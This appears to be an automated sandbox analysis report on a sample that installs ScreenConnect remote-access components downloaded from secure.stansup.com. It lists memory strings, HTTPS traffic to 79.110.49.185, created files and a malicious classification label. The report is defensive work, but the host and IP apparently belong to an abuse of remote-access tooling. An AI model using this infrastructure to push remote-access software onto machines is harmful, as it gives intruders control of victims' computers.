                  Source: svchost.exe, 00000008.00000003.1534017027.00000189C5F55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdence
                  Source: svchost.exe, 00000008.00000003.1534017027.00000189C5F55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdwsse:S
                  Source: svchost.exe, 00000008.00000002.2689297408.00000189C56D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: svchost.exe, 00000008.00000002.2689688397.00000189C5F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
                  Source: svchost.exe, 00000008.00000003.1517183349.00000189C5F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
                  Source: svchost.exe, 00000008.00000003.1517480585.00000189C5F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
                  Source: svchost.exe, 00000008.00000003.1534017027.00000189C5F55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAA
                  Source: svchost.exe, 00000008.00000003.1534017027.00000189C5F55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAABGI2aS3a
                  Source: svchost.exe, 00000008.00000002.2689688397.00000189C5F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdd
                  Source: svchost.exe, 00000008.00000003.1517183349.00000189C5F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1517366863.00000189C5F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdecuri
                  Source: svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdhema
                  Source: svchost.exe, 00000008.00000003.1517342229.00000189C5F53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlns:p
                  Source: svchost.exe, 00000008.00000003.1534017027.00000189C5F55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdpC9fPITA
                  Source: svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsis-2
                  Source: svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsoa
                  Source: svchost.exe, 00000008.00000003.1517342229.00000189C5F53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdtp:
                  Source: svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxml
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.2.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000002.00000002.2493129863.000001D459130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000002.00000002.2491755467.000001D457301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                  Source: svchost.exe, 00000008.00000002.2690008650.00000189C641B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689076222.00000189C5683000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2690289231.00000189C6487000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689329817.00000189C56EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                  Source: svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: svchost.exe, 00000008.00000002.2689862516.00000189C5F5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                  Source: svchost.exe, 00000008.00000002.2689862516.00000189C5F5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scon
                  Source: svchost.exe, 00000008.00000002.2689862516.00000189C5F5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1517383417.00000189C5F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1517383417.00000189C5F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: svchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue502
                  Source: svchost.exe, 00000008.00000002.2689297408.00000189C56D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EB8A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.1904297758.0000000001982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: dfsvc.exe, 00000002.00000002.2474748099.000001D43F26F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.stansup.com
                  Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                  Source: khwHsyfsJ1.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: svchost.exe, 00000008.00000003.1517183349.00000189C5F56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.(
                  Source: dfsvc.exe, 00000002.00000002.2493129863.000001D459130000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F166000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F13A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831972268.000000001B690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EC00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EC00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469232936.00000189C5F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=806013
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469232936.00000189C5F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468931306.00000189C5F57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                  Source: ScreenConnect.Core.dll.2.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
                  Source: svchost.exe, 00000007.00000003.1462695690.000001E0ECA00000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
                  Source: svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.ecur
                  Source: svchost.exe, 00000008.00000002.2688956884.00000189C562B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469232936.00000189C5F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469232936.00000189C5F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469017159.00000189C5F6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469017159.00000189C5F6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469017159.00000189C5F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                  Source: dfsvc.exe, 00000002.00000002.2495260176.000001D4592E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000002.00000002.2495260176.000001D4592E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configdZ
                  Source: dfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exea
                  Source: dfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000002.00000002.2495260176.000001D4592E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49727 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49728 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49729 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49733 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                  System Summary

                  Source: khwHsyfsJ1.exe PE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log
                  Source: khwHsyfsJ1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.2.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal66.evad.winEXE@18/77@2/2
